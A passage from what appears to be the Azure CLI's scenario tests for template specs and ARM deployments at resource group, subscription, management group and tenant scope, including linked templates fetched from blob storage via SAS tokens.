    # Update the description on the version resource itself.
    self.cmd('ts update -s {template_spec_version_id} --version-description {version_description} --yes', checks=[
        self.check('name', '1.0'),
        self.check('description', self.kwargs['version_description'].replace('"', '')),
        self.check('artifacts', None)
    ])
    # Ensure the linked artifact files exist before switching the version's
    # template to one that references them.
    path = os.path.join(curr_dir, 'artifacts')
    if not os.path.exists(path):
        files = ['createKeyVault.json', 'createKeyVaultWithSecret.json', 'createResourceGroup.json']
        os.makedirs(path)
        for f in files:
            shutil.copy(os.path.join(curr_dir, f), path)
    # Replacing the template keeps the version description and picks up the
    # three linked artifacts.
    self.cmd('ts update -g {rg} -n {template_spec_name} -v 1.0 -f "{tf1}" --yes', checks=[
        self.check('description', self.kwargs['version_description'].replace('"', '')),
        self.check('artifacts.length([])', 3),
        self.check_pattern('artifacts[0].path', 'artifacts.createResourceGroup.json'),
        self.check_pattern('artifacts[1].path', 'artifacts.createKeyVault.json'),
        self.check_pattern('artifacts[2].path', 'artifacts.createKeyVaultWithSecret.json')
    ])
    # clean up
    self.cmd('ts delete --template-spec {template_spec_id} --yes')
@ResourceGroupPreparer(name_prefix='cli_test_template_specs', location='westus')
def test_show_template_spec(self, resource_group, resource_group_location):
    """`ts show` by group/name and by resource id should both return the spec."""
    curr_dir = os.path.dirname(os.path.realpath(__file__))
    self.kwargs.update({
        'template_spec_name': self.create_random_name('cli-test-get-template-spec', 60),
        'tf': os.path.join(curr_dir, 'simple_deploy.json').replace('\\', '\\\\'),
        'resource_group_location': resource_group_location,
    })
    created = self.cmd('ts create -g {rg} -n {template_spec_name} -v 1.0 -l {resource_group_location} -f "{tf}"', checks=[
        self.check('name', '1.0')]).get_output_in_json()
    version_id = created['id']
    self.kwargs['template_spec_version_id'] = version_id
    self.kwargs['template_spec_id'] = version_id.replace('/versions/1.0', '')
    # Show the parent spec both ways; each response must be non-empty and of
    # the same size.
    shown_by_name = self.cmd('ts show -g {rg} --name {template_spec_name}').get_output_in_json()
    assert len(shown_by_name) > 0
    shown_by_id = self.cmd('ts show --template-spec {template_spec_id}').get_output_in_json()
    assert len(shown_by_id) > 0
    assert len(shown_by_name) == len(shown_by_id)
    # clean up
    self.cmd('ts delete --template-spec {template_spec_id} --yes')
@ResourceGroupPreparer(name_prefix='cli_test_template_specs', location='westus')
def test_delete_template_spec(self, resource_group, resource_group_location):
    """Deleting a single version keeps the parent template spec; deleting the
    parent removes the spec from the group listing."""
    curr_dir = os.path.dirname(os.path.realpath(__file__))
    template_spec_name = self.create_random_name('cli-test-list-template-spec', 60)
    self.kwargs.update({
        'resource_group_location': resource_group_location,
        'template_spec_name': template_spec_name,
        'tf': os.path.join(curr_dir, 'simple_deploy.json').replace('\\', '\\\\'),
    })
    result = self.cmd('ts create -g {rg} -n {template_spec_name} -v 1.0 -l {resource_group_location} -f "{tf}"',
                      checks=self.check('name', '1.0')).get_output_in_json()
    self.kwargs['template_spec_version_id'] = result['id']
    self.kwargs['template_spec_id'] = result['id'].replace('/versions/1.0', '')
    # Both the version and the parent should resolve before deletion.
    self.cmd('ts show --template-spec {template_spec_version_id}')
    self.cmd('ts show --template-spec {template_spec_id}')
    # Delete only the version; the parent must still be listed, the version not.
    self.cmd('ts delete --template-spec {template_spec_version_id} --yes')
    self.cmd('ts list -g {rg}',
             checks=[
                 self.check("length([?id=='{template_spec_id}'])", 1),
                 self.check("length([?id=='{template_spec_version_id}'])", 0)])
    # Delete the parent; nothing with its id should remain.
    self.cmd('ts delete --template-spec {template_spec_id} --yes')
    self.cmd('ts list -g {rg}',
             checks=self.check("length([?id=='{template_spec_id}'])", 0))
@ResourceGroupPreparer(name_prefix='cli_test_template_specs', location='westus')
def test_template_spec_create_and_update_with_tags(self, resource_group, resource_group_location):
    """Verify how --tags propagate between a template spec and its versions on
    create and update."""
    curr_dir = os.path.dirname(os.path.realpath(__file__))
    template_spec_name = self.create_random_name('cli-test-template-spec-tags', 60)
    self.kwargs.update({
        'template_spec_name': template_spec_name,
        'tf': os.path.join(curr_dir, 'simple_deploy.json').replace('\\', '\\\\'),
        'resource_group_location': resource_group_location,
        'display_name': self.create_random_name('create-spec', 20),
        'version_tags': {'cliName1': 'cliValue1', 'cliName4': 'cliValue4'}
    })
    # Tags should be applied to both the parent template spec and template spec version if neither existed:
    result = self.cmd('ts create -g {rg} -n {template_spec_name} -v 1.0 -l {resource_group_location} -f "{tf}" --tags cli-test=test').get_output_in_json()
    self.kwargs['template_spec_version_one_id'] = result['id']
    self.kwargs['template_spec_id'] = result['id'].replace('/versions/1.0', '')
    self.cmd('ts show --template-spec {template_spec_version_one_id}', checks=[self.check('tags', {'cli-test': 'test'})])
    self.cmd('ts show --template-spec {template_spec_id}', checks=[self.check('tags', {'cli-test': 'test'})])
    # New template spec version should inherit tags from parent template spec if tags are not specified:
    self.cmd('ts create -g {rg} -n {template_spec_name} -v 2.0 -l {resource_group_location} -f "{tf}"')
    # v2.0/v3.0 ids are derived by string substitution on the v1.0 id rather
    # than re-querying the service.
    self.kwargs['template_spec_version_two_id'] = result['id'].replace('/versions/1.0', '/versions/2.0')
    self.cmd('ts show --template-spec {template_spec_version_two_id}', checks=[self.check('tags', {'cli-test': 'test'})])
    # Tags should only apply to template spec version (and not the parent template spec) if parent already exist:
    self.cmd('ts create -g {rg} -n {template_spec_name} -v 3.0 -l {resource_group_location} -f "{tf}" --tags cliName1=cliValue1 cliName4=cliValue4')
    self.kwargs['template_spec_version_three_id'] = result['id'].replace('/versions/1.0', '/versions/3.0')
    self.cmd('ts show --template-spec {template_spec_version_three_id}', checks=[self.check('tags', '{version_tags}')])
    self.cmd('ts show --template-spec {template_spec_id}', checks=[self.check('tags', {'cli-test': 'test'})])
    # When updating a template spec, tags should only be removed if explicitly empty. Create should override.
    self.cmd('ts update -g {rg} -n {template_spec_name} -v 1.0 -f "{tf}" --yes')
    self.cmd('ts show --template-spec {template_spec_version_one_id}', checks=[self.check('tags', {'cli-test': 'test'})])
    self.cmd('ts update -g {rg} -n {template_spec_name} -v 1.0 -f "{tf}" --tags "" --yes')
    self.cmd('ts show --template-spec {template_spec_version_one_id}', checks=[self.check('tags', {})])
    self.cmd('ts update -g {rg} -n {template_spec_name} -v 2.0 -f "{tf}" --tags --yes')
    self.cmd('ts show --template-spec {template_spec_version_two_id}', checks=[self.check('tags', {})])
    self.cmd('ts create -g {rg} -n {template_spec_name} -v 3.0 -f "{tf}" --tags --yes')
    self.cmd('ts show --template-spec {template_spec_version_three_id}', checks=[self.check('tags', {})])
    self.cmd('ts show --template-spec {template_spec_id}', checks=[self.check('tags', {'cli-test': 'test'})])
    self.cmd('ts create -g {rg} -n {template_spec_name} --yes')
    self.cmd('ts show --template-spec {template_spec_id}', checks=[self.check('tags', {})])
    # clean up
    self.cmd('ts delete --template-spec {template_spec_id} --yes')
class TemplateSpecsExportTest(LiveScenarioTest):
    """Live tests for `az ts export` on a template spec with linked artifacts.

    Fix: the last line of the original test ended with a stray trailing
    backslash, which line-continued the final assertion into the next class
    statement and broke the file's syntax. The duplicated verification of the
    two exports is also factored into a helper.
    """

    # Artifact files referenced by template_spec_with_artifacts.json.
    _ARTIFACT_NAMES = ('createResourceGroup.json', 'createKeyVault.json', 'createKeyVaultWithSecret.json')

    def _check_exported_files(self, output_path):
        """Assert the exported root template and every artifact exist on disk."""
        template_file = os.path.join(output_path, self.kwargs['template_spec_name'] + '.json')
        self.assertTrue(os.path.isfile(template_file))
        for artifact in self._ARTIFACT_NAMES:
            self.assertTrue(os.path.isfile(os.path.join(output_path, 'artifacts' + os.sep + artifact)))

    @ResourceGroupPreparer(name_prefix='cli_test_template_specs', location='westus')
    def test_export_template_spec(self, resource_group, resource_group_location):
        """Export a version by group/name/version and by resource id; both
        exports must contain the template file and all three artifacts."""
        curr_dir = os.path.dirname(os.path.realpath(__file__))
        dir_name = self.create_random_name('TemplateSpecExport', 30)
        dir_name2 = self.create_random_name('TemplateSpecExport', 30)
        template_spec_name = self.create_random_name('cli-test-export-template-spec', 60)
        self.kwargs.update({
            'template_spec_name': template_spec_name,
            'tf': os.path.join(curr_dir, 'template_spec_with_artifacts.json').replace('\\', '\\\\'),
            'resource_group_location': resource_group_location,
            'output_folder': os.path.join(curr_dir, dir_name).replace('\\', '\\\\'),
            'output_folder2': os.path.join(curr_dir, dir_name2).replace('\\', '\\\\'),
        })
        # Make sure the linked artifact files exist next to the root template.
        path = os.path.join(curr_dir, 'artifacts')
        if not os.path.exists(path):
            files = ['createKeyVault.json', 'createKeyVaultWithSecret.json', 'createResourceGroup.json']
            os.makedirs(path)
            for f in files:
                shutil.copy(os.path.join(curr_dir, f), path)
        result = self.cmd('ts create -g {rg} -n {template_spec_name} -v 1.0 -l {resource_group_location} -f "{tf}"',
                          checks=self.check('name', '1.0')).get_output_in_json()
        self.kwargs['template_spec_version_id'] = result['id']
        # Export addressed by resource group + name + version.
        os.makedirs(self.kwargs['output_folder'])
        output_path = self.cmd('ts export -g {rg} --name {template_spec_name} --version 1.0 --output-folder {output_folder}').get_output_in_json()
        self._check_exported_files(output_path)
        # Export addressed by the version's resource id.
        os.makedirs(self.kwargs['output_folder2'])
        output_path2 = self.cmd('ts export --template-spec {template_spec_version_id} --output-folder {output_folder2}').get_output_in_json()
        self._check_exported_files(output_path2)
class DeploymentTestsWithQueryString(LiveScenarioTest):
    """Deployments whose linked templates are fetched from blob storage using a
    SAS token supplied via --query-string."""

    @ResourceGroupPreparer(name_prefix='cli_test_query_str_rg', location='eastus')
    @StorageAccountPreparer(name_prefix='testquerystrrg', location='eastus', kind='StorageV2')
    def test_resource_group_level_deployment_with_query_string(self, resource_group, resource_group_location, storage_account):
        """Validate and deploy a resource-group template whose linked template is
        resolved from a storage container using the SAS query string."""
        container_name = self.create_random_name('querystr', 20)
        curr_dir = os.path.dirname(os.path.realpath(__file__))
        tf = os.path.join(curr_dir, 'resource_group_level_linked_template.json')
        linked_template = os.path.join(curr_dir, 'storage_account_linked_template.json')
        self.kwargs.update({
            'resource_group': resource_group,
            'storage_account': storage_account,
            'container_name': container_name,
            'tf': tf,
            'linked_tf': linked_template
        })
        # Upload the main and linked templates into a new container.
        self.kwargs['storage_key'] = str(self.cmd('az storage account keys list -n {storage_account} -g {resource_group} --query "[0].value"').output)
        self.cmd('storage container create -n {container_name} --account-name {storage_account} --account-key {storage_key}')
        self.cmd('storage blob upload -c {container_name} -f "{tf}" -n mainTemplate --account-name {storage_account} --account-key {storage_key}')
        self.cmd('storage blob upload -c {container_name} -f "{linked_tf}" -n storage_account_linked_template.json --account-name {storage_account} --account-key {storage_key}')
        from datetime import datetime, timedelta
        # Container SAS valid for 12 hours; passed to the deployment commands
        # as --query-string so linked templates can be fetched.
        self.kwargs['expiry'] = (datetime.utcnow() + timedelta(hours=12)).strftime('%Y-%m-%dT%H:%MZ')
        self.kwargs['sas_token'] = self.cmd(
            'storage container generate-sas --account-name {storage_account} --account-key {storage_key} --name {container_name} --permissions rw --expiry {expiry} -otsv').output.strip()
        self.kwargs['blob_url'] = self.cmd(
            'storage blob url -c {container_name} -n mainTemplate --account-name {storage_account} --account-key {storage_key}').output.strip()
        self.cmd('deployment group validate -g {resource_group} --template-uri {blob_url} --query-string "{sas_token}" --parameters projectName=qsproject', checks=[
            self.check('properties.provisioningState', 'Succeeded')
        ])
        self.cmd('deployment group create -g {resource_group} --template-uri {blob_url} --query-string "{sas_token}" --parameters projectName=qsproject', checks=[
            self.check('properties.provisioningState', 'Succeeded')
        ])

    @ResourceGroupPreparer(name_prefix='cli_test_query_str_sub', location='eastus')
    @StorageAccountPreparer(name_prefix='testquerystrsub', location='eastus', kind='StorageV2')
    def test_subscription_level_deployment_with_query_string(self, resource_group, resource_group_location, storage_account):
        """Same scenario at subscription scope, with three linked templates."""
        container_name = self.create_random_name('querystr', 20)
        curr_dir = os.path.dirname(os.path.realpath(__file__))
        tf = os.path.join(curr_dir, 'subscription_level_linked_template.json')
        linked_tf = os.path.join(curr_dir, 'createResourceGroup.json')
        linked_tf1 = os.path.join(curr_dir, 'createKeyVault.json')
        linked_tf2 = os.path.join(curr_dir, 'createKeyVaultWithSecret.json')
        self.kwargs.update({
            'resource_group': resource_group,
            'resource_group_location': resource_group_location,
            'storage_account': storage_account,
            'container_name': container_name,
            'tf': tf,
            'linked_tf': linked_tf,
            'linked_tf1': linked_tf1,
            'linked_tf2': linked_tf2
        })
        # Upload the main template and every linked template to the container.
        self.kwargs['storage_key'] = str(self.cmd('az storage account keys list -n {storage_account} -g {resource_group} --query "[0].value"').output)
        self.cmd('storage container create -n {container_name} --account-name {storage_account} --account-key {storage_key}')
        self.cmd('storage blob upload -c {container_name} -f "{tf}" -n mainTemplate --account-name {storage_account} --account-key {storage_key}')
        self.cmd('storage blob upload -c {container_name} -f "{linked_tf}" -n createResourceGroup.json --account-name {storage_account} --account-key {storage_key}')
        self.cmd('storage blob upload -c {container_name} -f "{linked_tf1}" -n createKeyVault.json --account-name {storage_account} --account-key {storage_key}')
        self.cmd('storage blob upload -c {container_name} -f "{linked_tf2}" -n createKeyVaultWithSecret.json --account-name {storage_account} --account-key {storage_key}')
        from datetime import datetime, timedelta
        # SAS valid for 12 hours; this one is HTTPS-only with dlrw permissions.
        self.kwargs['expiry'] = (datetime.utcnow() + timedelta(hours=12)).strftime('%Y-%m-%dT%H:%MZ')
        self.kwargs['sas_token'] = self.cmd(
            'storage container generate-sas --account-name {storage_account} --name {container_name} --permissions dlrw --expiry {expiry} --https-only -otsv').output.strip()
        self.kwargs['blob_url'] = self.cmd(
            'storage blob url -c {container_name} -n mainTemplate --account-name {storage_account}').output.strip()
        self.kwargs['key_vault'] = self.create_random_name('querystrKV', 20)
        self.cmd('deployment sub validate -l {resource_group_location} --template-uri {blob_url} --query-string "{sas_token}" --parameters keyVaultName="{key_vault}" rgName="{resource_group}" rgLocation="{resource_group_location}"', checks=[
            self.check('properties.provisioningState', 'Succeeded')
        ])
        self.cmd('deployment sub create -l {resource_group_location} --template-uri {blob_url} --query-string "{sas_token}" --parameters keyVaultName="{key_vault}" rgName="{resource_group}" rgLocation="{resource_group_location}"', checks=[
            self.check('properties.provisioningState', 'Succeeded')
        ])
class DeploymentTestAtSubscriptionScope(ScenarioTest):
    """Subscription-scope deployment tests, covering both `az deployment sub`
    and the older `az deployment` command group."""

    def tearDown(self):
        # Delete the subscription-level resources the template creates; there
        # is no resource-group preparer to clean these up automatically.
        self.cmd('policy assignment delete -n location-lock')
        self.cmd('policy definition delete -n policy2')
        self.cmd('group delete -n cli_test_subscription_level_deployment --yes')

    @AllowLargeResponse(4096)
    def test_subscription_level_deployment(self):
        """validate / create / list / show / export / cancel with `deployment sub`."""
        curr_dir = os.path.dirname(os.path.realpath(__file__))
        self.kwargs.update({
            'tf': os.path.join(curr_dir, 'subscription_level_template.json').replace('\\', '\\\\'),
            'params': os.path.join(curr_dir, 'subscription_level_parameters.json').replace('\\', '\\\\'),
            # params-uri below is the raw file url of the subscription_level_parameters.json above
            'params_uri': 'https://raw.githubusercontent.com/Azure/azure-cli/dev/src/azure-cli/azure/cli/command_modules/resource/tests/latest/subscription_level_parameters.json',
            'dn': self.create_random_name('azure-cli-subscription_level_deployment', 60),
            'dn2': self.create_random_name('azure-cli-subscription_level_deployment', 60),
            'storage-account-name': self.create_random_name('armbuilddemo', 20)
        })
        # Validation with local parameter file plus an inline override.
        self.cmd('deployment sub validate --location WestUS --template-file "{tf}" --parameters @"{params}" --parameters storageAccountName="{storage-account-name}"', checks=[
            self.check('properties.provisioningState', 'Succeeded')
        ])
        # Validation with parameters referenced by URI.
        self.cmd('deployment sub validate --location WestUS --template-file "{tf}" --parameters "{params_uri}"', checks=[
            self.check('properties.provisioningState', 'Succeeded')
        ])
        self.cmd('deployment sub create -n {dn} --location WestUS --template-file "{tf}" --parameters @"{params}" --parameters storageAccountName="{storage-account-name}"', checks=[
            self.check('properties.provisioningState', 'Succeeded'),
        ])
        self.cmd('deployment sub list', checks=[
            self.check('[0].name', '{dn}'),
        ])
        self.cmd('deployment sub list --filter "provisioningState eq \'Succeeded\'"', checks=[
            self.check('[0].name', '{dn}'),
        ])
        self.cmd('deployment sub show -n {dn}', checks=[
            self.check('name', '{dn}')
        ])
        self.cmd('deployment sub export -n {dn}', checks=[
        ])
        self.cmd('deployment operation sub list -n {dn}', checks=[
            self.check('length([])', 5)
        ])
        # Start a second deployment without waiting, then cancel it.
        self.cmd('deployment sub create -n {dn2} --location WestUS --template-file "{tf}" --parameters @"{params}" '
                 '--parameters storageAccountName="{storage-account-name}" --no-wait')
        self.cmd('deployment sub cancel -n {dn2}')
        self.cmd('deployment sub show -n {dn2}', checks=[
            self.check('properties.provisioningState', 'Canceled')
        ])

    @AllowLargeResponse(4096)
    def test_subscription_level_deployment_old_command(self):
        """Same flow through the deprecated top-level `deployment` commands."""
        curr_dir = os.path.dirname(os.path.realpath(__file__))
        deployment_name = self.create_random_name('azure-cli-subscription_level_deployment', 60)
        self.kwargs.update({
            'tf': os.path.join(curr_dir, 'subscription_level_template.json').replace('\\', '\\\\'),
            'params': os.path.join(curr_dir, 'subscription_level_parameters.json').replace('\\', '\\\\'),
            # params-uri below is the raw file url of the subscription_level_parameters.json above
            'params_uri': 'https://raw.githubusercontent.com/Azure/azure-cli/dev/src/azure-cli/azure/cli/command_modules/resource/tests/latest/subscription_level_parameters.json',
            'dn': deployment_name,
            'dn2': self.create_random_name('azure-cli-subscription_level_deployment', 60),
            'storage-account-name': self.create_random_name('armbuilddemo', 20)
        })
        self.cmd('deployment validate --location WestUS --template-file "{tf}" --parameters @"{params}" --parameters storageAccountName="{storage-account-name}" ', checks=[
            self.check('properties.provisioningState', 'Succeeded')
        ])
        self.cmd('deployment validate --location WestUS --template-file "{tf}" --parameters "{params_uri}"', checks=[
            self.check('properties.provisioningState', 'Succeeded')
        ])
        self.cmd('deployment create -n {dn} --location WestUS --template-file "{tf}" --parameters @"{params}" --parameters storageAccountName="{storage-account-name}" ', checks=[
            self.check('properties.provisioningState', 'Succeeded'),
        ])
        # `deployment list` is unscoped here, so narrow with a JMESPath filter
        # on the known deployment name.
        self.cmd('deployment list --query "[?name == \'{}\']"'.format(deployment_name), checks=[
            self.check('[0].name', '{dn}'),
        ])
        self.cmd('deployment list --filter "provisioningState eq \'Succeeded\'" --query "[?name == \'{}\']"'.format(deployment_name), checks=[
            self.check('[0].name', '{dn}')
        ])
        self.cmd('deployment show -n {dn}', checks=[
            self.check('name', '{dn}')
        ])
        self.cmd('deployment export -n {dn}', checks=[
        ])
        self.cmd('deployment operation list -n {dn}', checks=[
            self.check('length([])', 5)
        ])
        # Start a second deployment without waiting, then cancel it.
        self.cmd('deployment create -n {dn2} --location WestUS --template-file "{tf}" --parameters @"{params}" '
                 '--parameters storageAccountName="{storage-account-name}" --no-wait')
        self.cmd('deployment cancel -n {dn2}')
        self.cmd('deployment show -n {dn2}', checks=[
            self.check('properties.provisioningState', 'Canceled')
        ])
class DeploymentTestAtResourceGroup(ScenarioTest):
    """Resource-group-scope deployment tests (`az deployment group`).

    Fix: the invalid-JSON assertions previously compared a formatted string to
    the CLIError object itself with `==` (always False) and used
    `in err.exception` (exceptions are not containers), while also passing the
    literal placeholder string (e.g. '{tf_invalid}') instead of the expanded
    file path. They now format with the real path from self.kwargs and compare
    against str(err.exception).
    """

    @ResourceGroupPreparer(name_prefix='cli_test_resource_group_deployment')
    def test_resource_group_deployment(self):
        """validate / create / list / show / export / cancel at group scope,
        including prompt handling and invalid-JSON error paths."""
        curr_dir = os.path.dirname(os.path.realpath(__file__))
        self.kwargs.update({
            'tf': os.path.join(curr_dir, 'simple_deploy.json').replace('\\', '\\\\'),
            'tf_multiline': os.path.join(curr_dir, 'simple_deploy_multiline.json').replace('\\', '\\\\'),
            'tf_invalid': os.path.join(curr_dir, 'simple_deploy_invalid.json').replace('\\', '\\\\'),
            'extra_param_tf': os.path.join(curr_dir, 'simple_extra_param_deploy.json').replace('\\', '\\\\'),
            'params': os.path.join(curr_dir, 'simple_deploy_parameters.json').replace('\\', '\\\\'),
            'params_invalid': os.path.join(curr_dir, 'simple_deploy_parameters_invalid.json').replace('\\', '\\\\'),
            'dn': self.create_random_name('azure-cli-resource-group-deployment', 60),
            'dn2': self.create_random_name('azure-cli-resource-group-deployment', 60),
            'Japanese-characters-tf': os.path.join(curr_dir, 'Japanese-characters-template.json').replace('\\', '\\\\')
        })
        self.cmd('deployment group validate --resource-group {rg} --template-file "{tf}" --parameters @"{params}"', checks=[
            self.check('properties.provisioningState', 'Succeeded')
        ])
        self.cmd('deployment group validate --resource-group {rg} --template-file "{Japanese-characters-tf}"', checks=[
            self.check('properties.provisioningState', 'Succeeded')
        ])
        self.cmd('deployment group validate --resource-group {rg} --template-file "{tf_multiline}" --parameters @"{params}"', checks=[
            self.check('properties.provisioningState', 'Succeeded')
        ])
        # Extra template parameter without a value: with --no-prompt true the
        # service reports a validation failure; otherwise the CLI asks for the
        # missing parameter and fails because the test cannot answer prompts.
        with self.assertRaises(CLIError) as err:
            self.cmd('deployment group validate --resource-group {rg} --template-file "{extra_param_tf}" --parameters @"{params}" --no-prompt true')
        self.assertTrue("Deployment template validation failed" in str(err.exception))
        with self.assertRaises(CLIError) as err:
            self.cmd('deployment group validate --resource-group {rg} --template-file "{extra_param_tf}" --parameters @"{params}"')
        self.assertTrue("Missing input parameters" in str(err.exception))
        with self.assertRaises(CLIError) as err:
            self.cmd('deployment group validate --resource-group {rg} --template-file "{extra_param_tf}" --parameters @"{params}" --no-prompt false')
        self.assertTrue("Missing input parameters" in str(err.exception))
        self.cmd('deployment group create --resource-group {rg} -n {dn} --template-file "{tf}" --parameters @"{params}"', checks=[
            self.check('properties.provisioningState', 'Succeeded'),
        ])
        self.cmd('deployment group create --resource-group {rg} -n {dn} --template-file "{tf_multiline}" --parameters @"{params}"', checks=[
            self.check('properties.provisioningState', 'Succeeded'),
        ])
        with self.assertRaises(CLIError) as err:
            self.cmd('deployment group create --resource-group {rg} -n {dn2} --template-file "{extra_param_tf}" --parameters @"{params}" --no-prompt true')
        self.assertTrue("Deployment template validation failed" in str(err.exception))
        with self.assertRaises(CLIError) as err:
            self.cmd('deployment group create --resource-group {rg} -n {dn2} --template-file "{extra_param_tf}" --parameters @"{params}"')
        self.assertTrue("Missing input parameters" in str(err.exception))
        with self.assertRaises(CLIError) as err:
            self.cmd('deployment group create --resource-group {rg} -n {dn2} --template-file "{extra_param_tf}" --parameters @"{params}" --no-prompt false')
        self.assertTrue("Missing input parameters" in str(err.exception))
        # Malformed template / parameter files must surface a parse error that
        # names the offending file.
        json_invalid_info = "Failed to parse '{}', please check whether it is a valid JSON format"
        with self.assertRaises(CLIError) as err:
            self.cmd('deployment group validate -g {rg} -f "{tf_invalid}" -p @"{params}"')
        self.assertIn(json_invalid_info.format(self.kwargs['tf_invalid']), str(err.exception))
        with self.assertRaises(CLIError) as err:
            self.cmd('deployment group validate -g {rg} -f "{tf}" -p @"{params_invalid}"')
        self.assertIn(json_invalid_info.format(self.kwargs['params_invalid']), str(err.exception))
        with self.assertRaises(CLIError) as err:
            self.cmd('deployment group create -g {rg} -n {dn} -f "{tf_invalid}" -p @"{params}"')
        self.assertIn(json_invalid_info.format(self.kwargs['tf_invalid']), str(err.exception))
        with self.assertRaises(CLIError) as err:
            self.cmd('deployment group create -g {rg} -n {dn} -f "{tf}" -p @"{params_invalid}"')
        self.assertIn(json_invalid_info.format(self.kwargs['params_invalid']), str(err.exception))
        self.cmd('deployment group list --resource-group {rg}', checks=[
            self.check('[0].name', '{dn}'),
        ])
        self.cmd('deployment group list --resource-group {rg} --filter "provisioningState eq \'Succeeded\'"', checks=[
            self.check('[0].name', '{dn}'),
        ])
        self.cmd('deployment group show --resource-group {rg} -n {dn}', checks=[
            self.check('name', '{dn}')
        ])
        self.cmd('deployment group export --resource-group {rg} -n {dn}', checks=[
        ])
        self.cmd('deployment operation group list --resource-group {rg} -n {dn}', checks=[
            self.check('length([])', 2)
        ])
        # Start a deployment without waiting, cancel it, and wait for the
        # canceled state before asserting on it.
        self.cmd('deployment group create --resource-group {rg} -n {dn2} --template-file "{tf}" --parameters @"{params}" --no-wait')
        self.cmd('deployment group cancel -n {dn2} -g {rg}')
        self.cmd('deployment group wait -n {dn2} -g {rg} --custom "provisioningState==Canceled"')
        self.cmd('deployment group show -n {dn2} -g {rg}', checks=[
            self.check('properties.provisioningState', 'Canceled')
        ])
class DeploymentTestAtManagementGroup(ScenarioTest):
    """Management-group-scope deployment tests (`az deployment mg`)."""

    def test_management_group_deployment(self):
        """Create a management group, run validate / create / list / show /
        export / cancel against it, then delete the group."""
        curr_dir = os.path.dirname(os.path.realpath(__file__))
        self.kwargs.update({
            'tf': os.path.join(curr_dir, 'management_group_level_template.json').replace('\\', '\\\\'),
            'params': os.path.join(curr_dir, 'management_group_level_parameters.json').replace('\\', '\\\\'),
            'dn': self.create_random_name('azure-cli-management-group-deployment', 60),
            'mg': self.create_random_name('azure-cli-management', 30),
            'sub-rg': self.create_random_name('azure-cli-sub-resource-group', 60),
            'dn2': self.create_random_name('azure-cli-resource-group-deployment', 60),
            'storage-account-name': self.create_random_name('armbuilddemo', 20)
        })
        # The target management group must exist before deploying to it.
        self.cmd('account management-group create --name {mg}', checks=[])
        self.cmd('deployment mg validate --management-group-id {mg} --location WestUS --template-file "{tf}" '
                 '--parameters @"{params}" --parameters targetMG="{mg}" --parameters nestedRG="{sub-rg}" '
                 '--parameters storageAccountName="{storage-account-name}"',
                 checks=[self.check('properties.provisioningState', 'Succeeded'), ])
        self.cmd('deployment mg create --management-group-id {mg} --location WestUS -n {dn} --template-file "{tf}" '
                 '--parameters @"{params}" --parameters targetMG="{mg}" --parameters nestedRG="{sub-rg}" '
                 '--parameters storageAccountName="{storage-account-name}"',
                 checks=[self.check('properties.provisioningState', 'Succeeded'), ])
        self.cmd('deployment mg list --management-group-id {mg}', checks=[
            self.check('[0].name', '{dn}'),
        ])
        self.cmd('deployment mg list --management-group-id {mg} --filter "provisioningState eq \'Succeeded\'"', checks=[
            self.check('[0].name', '{dn}'),
        ])
        self.cmd('deployment mg show --management-group-id {mg} -n {dn}', checks=[
            self.check('name', '{dn}')
        ])
        self.cmd('deployment mg export --management-group-id {mg} -n {dn}', checks=[
        ])
        self.cmd('deployment operation mg list --management-group-id {mg} -n {dn}', checks=[
            self.check('length([])', 4)
        ])
        # Start a second deployment without waiting, cancel it, and wait for
        # the canceled state before asserting.
        self.cmd('deployment mg create --management-group-id {mg} --location WestUS -n {dn2} --template-file "{tf}" '
                 '--parameters @"{params}" --parameters targetMG="{mg}" --parameters nestedRG="{sub-rg}" '
                 '--parameters storageAccountName="{storage-account-name}" --no-wait')
        self.cmd('deployment mg cancel -n {dn2} --management-group-id {mg}')
        self.cmd('deployment mg wait -n {dn2} --management-group-id {mg} --custom "provisioningState==Canceled"')
        self.cmd('deployment mg show -n {dn2} --management-group-id {mg}', checks=[
            self.check('properties.provisioningState', 'Canceled')
        ])
        # clean
        self.cmd('account management-group delete -n {mg}')
class DeploymentTestAtTenantScope(ScenarioTest):
    """Tenant-scope deployment tests (`az deployment tenant`)."""

    def test_tenant_level_deployment(self):
        """validate / create / list / show / export / cancel at tenant scope."""
        curr_dir = os.path.dirname(os.path.realpath(__file__))
        self.kwargs.update({
            'tf': os.path.join(curr_dir, 'tenant_level_template.json').replace('\\', '\\\\'),
            'dn': self.create_random_name('azure-cli-tenant-level-deployment', 60),
            'mg': self.create_random_name('azure-cli-management-group', 40),
            'dn2': self.create_random_name('azure-cli-resource-group-deployment', 60)
        })
        # The template targets a management group, so create one first.
        self.cmd('account management-group create --name {mg}', checks=[])
        self.cmd('deployment tenant validate --location WestUS --template-file "{tf}" --parameters targetMG="{mg}"', checks=[
            self.check('properties.provisioningState', 'Succeeded')
        ])
        self.cmd('deployment tenant create --location WestUS -n {dn} --template-file "{tf}" --parameters targetMG="{mg}"', checks=[
            self.check('properties.provisioningState', 'Succeeded'),
        ])
        self.cmd('deployment tenant list', checks=[
            self.check('[0].name', '{dn}'),
        ])
        self.cmd('deployment tenant list --filter "provisioningState eq \'Succeeded\'"', checks=[
            self.check('[0].name', '{dn}'),
        ])
        self.cmd('deployment tenant show -n {dn}', checks=[
            self.check('name', '{dn}')
        ])
        self.cmd('deployment tenant export -n {dn}', checks=[
        ])
        self.cmd('deployment operation tenant list -n {dn}', checks=[
            self.check('length([])', 4)
        ])
        # Start a second deployment without waiting, then cancel it.
        self.cmd('deployment tenant create --location WestUS -n {dn2} --template-file "{tf}" --parameters targetMG="{mg}" --no-wait')
        self.cmd('deployment tenant cancel -n {dn2}')
        self.cmd('deployment tenant show -n {dn2}', checks=[
            self.check('properties.provisioningState', 'Canceled')
        ])
        # Clean up the resource group the template creates (hard-coded name)
        # and the management group created above.
        self.cmd('group delete -n cli_tenant_level_deployment --yes')
        self.cmd('account management-group delete -n {mg}')
class DeploymentTest(ScenarioTest):
    @ResourceGroupPreparer(name_prefix='cli_test_deployment_lite')
    def test_group_deployment_lite(self, resource_group):
        """A template that is missing "parameters" or "resources" still deploys."""
        curr_dir = os.path.dirname(os.path.realpath(__file__))
        self.kwargs.update({
            'tf': os.path.join(curr_dir, 'test-template-lite.json').replace('\\', '\\\\'),
            'dn': self.create_random_name('azure-cli-deployment', 30)
        })
        self.cmd('group deployment create -g {rg} -n {dn} --template-file "{tf}"', checks=[
            self.check('properties.provisioningState', 'Succeeded'),
            self.check('resourceGroup', '{rg}')
        ])

    @ResourceGroupPreparer(name_prefix='cli_test_deployment')
    def test_group_deployment(self, resource_group):
        """Full `group deployment` lifecycle: validate (local file, remote uri and
        bad parameters), create, list, show, operations, invalid-JSON error
